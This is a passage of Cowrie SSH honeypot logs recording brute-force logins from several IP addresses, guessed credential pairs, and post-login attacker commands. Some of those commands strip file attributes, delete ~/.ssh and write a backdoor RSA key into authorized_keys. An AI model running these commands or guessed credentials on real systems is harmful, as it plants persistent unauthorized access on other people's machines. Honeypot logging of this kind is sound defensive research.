sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:53.315603Z","src_ip":"212.227.235.229","session":"39d027c40fbb"}
{"eventid":"cowrie.login.failed","username":"operator","password":"Welcome1","message":"login attempt [operator/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:40:53.876904Z","src_ip":"212.227.235.229","session":"39d027c40fbb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:55.010018Z","src_ip":"212.227.235.229","session":"39d027c40fbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56376,"dst_ip":"1.2.3.4","dst_port":22,"session":"977bf3fa98b4","protocol":"ssh","message":"New connection: 212.227.235.229:56376 (1.2.3.4:22) [session: 977bf3fa98b4]","sensor":"my-vps","timestamp":"2025-09-08T12:40:55.035429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:55.036330Z","src_ip":"212.227.235.229","session":"977bf3fa98b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:55.298382Z","src_ip":"212.227.235.229","session":"977bf3fa98b4"}
{"eventid":"cowrie.login.failed","username":"audit","password":"2025","message":"login attempt [audit/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:40:56.386621Z","src_ip":"212.227.235.229","session":"977bf3fa98b4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:57.652357Z","src_ip":"212.227.235.229","session":"977bf3fa98b4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57958,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d64e3223559","protocol":"ssh","message":"New connection: 217.72.205.35:57958 (1.2.3.4:22) [session: 7d64e3223559]","sensor":"my-vps","timestamp":"2025-09-08T12:40:57.819545Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:57.820689Z","src_ip":"217.72.205.35","session":"7d64e3223559"}
{"eventid":"cowrie.session.connect","src_ip":"134.209.36.11","src_port":49018,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3d980ef2157","protocol":"ssh","message":"New connection: 134.209.36.11:49018 (1.2.3.4:22) [session: d3d980ef2157]","sensor":"my-vps","timestamp":"2025-09-08T12:41:00.485456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:00.486193Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:00.579525Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.login.success","username":"root","password":"centos_123","message":"login attempt [root/centos_123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:41:00.996675Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:41:01.233386Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.234231Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.235483Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.330505Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:41:01.541826Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.542835Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.638945Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.639956Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.session.connect","src_ip":"134.209.36.11","src_port":49028,"dst_ip":"1.2.3.4","dst_port":22,"session":"cba330ecb360","protocol":"ssh","message":"New connection: 134.209.36.11:49028 (1.2.3.4:22) [session: cba330ecb360]","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.733447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.734392Z","src_ip":"134.209.36.11","session":"cba330ecb360"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:01.825788Z","src_ip":"134.209.36.11","session":"cba330ecb360"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:02.231708Z","src_ip":"134.209.36.11","session":"cba330ecb360"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56286,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c3cdfc9a09c","protocol":"ssh","message":"New connection: 212.227.235.229:56286 (1.2.3.4:22) [session: 6c3cdfc9a09c]","sensor":"my-vps","timestamp":"2025-09-08T12:41:02.366922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:02.369462Z","src_ip":"212.227.235.229","session":"6c3cdfc9a09c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:02.657254Z","src_ip":"212.227.235.229","session":"6c3cdfc9a09c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:03.323802Z","src_ip":"134.209.36.11","session":"cba330ecb360"}
{"eventid":"cowrie.session.connect","src_ip":"134.209.36.11","src_port":49044,"dst_ip":"1.2.3.4","dst_port":22,"session":"47a61a874561","protocol":"ssh","message":"New connection: 134.209.36.11:49044 (1.2.3.4:22) [session: 47a61a874561]","sensor":"my-vps","timestamp":"2025-09-08T12:41:03.413071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:03.413862Z","src_ip":"134.209.36.11","session":"47a61a874561"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:03.505174Z","src_ip":"134.209.36.11","session":"47a61a874561"}
{"eventid":"cowrie.login.failed","username":"mos","password":"123456789","message":"login attempt [mos/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T12:41:03.807048Z","src_ip":"212.227.235.229","session":"6c3cdfc9a09c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:41:03.910978Z","src_ip":"134.209.36.11","session":"47a61a874561"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:04.003526Z","src_ip":"134.209.36.11","session":"47a61a874561"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:04.004920Z","src_ip":"134.209.36.11","session":"d3d980ef2157"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:05.099793Z","src_ip":"212.227.235.229","session":"6c3cdfc9a09c"}
{"eventid":"cowrie.session.connect","src_ip":"106.51.92.114","src_port":49449,"dst_ip":"1.2.3.4","dst_port":22,"session":"629c3e2f77d7","protocol":"ssh","message":"New connection: 106.51.92.114:49449 (1.2.3.4:22) [session: 629c3e2f77d7]","sensor":"my-vps","timestamp":"2025-09-08T12:41:16.799384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:16.800330Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:41:17.103543Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.login.success","username":"root","password":"ghostuser1!","message":"login attempt [root/ghostuser1!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:41:18.353608Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:41:18.996795Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:41:18.997612Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:41:18.998718Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:19.303611Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:41:19.925281Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:41:19.925958Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.231320Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.232288Z","src_ip":"106.51.92.114","session":"629c3e2f77d7"}
{"eventid":"cowrie.session.connect","src_ip":"106.51.92.114","src_port":49892,"dst_ip":"1.2.3.4","dst_port":22,"session":"628b434ecc7a","protocol":"ssh","message":"New connection: 106.51.92.114:49892 (1.2.3.4:22) [session: 628b434ecc7a]","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.489995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.490776Z","src_ip":"106.51.92.114","session":"628b434ecc7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37646,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ac900560045","protocol":"ssh","message":"New connection: 212.227.235.229:37646 (1.2.3.4:22) [session: 9ac900560045]","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.670845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:41:20.672108Z","src_ip":"212.227.235.229","session":"9ac900560045"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac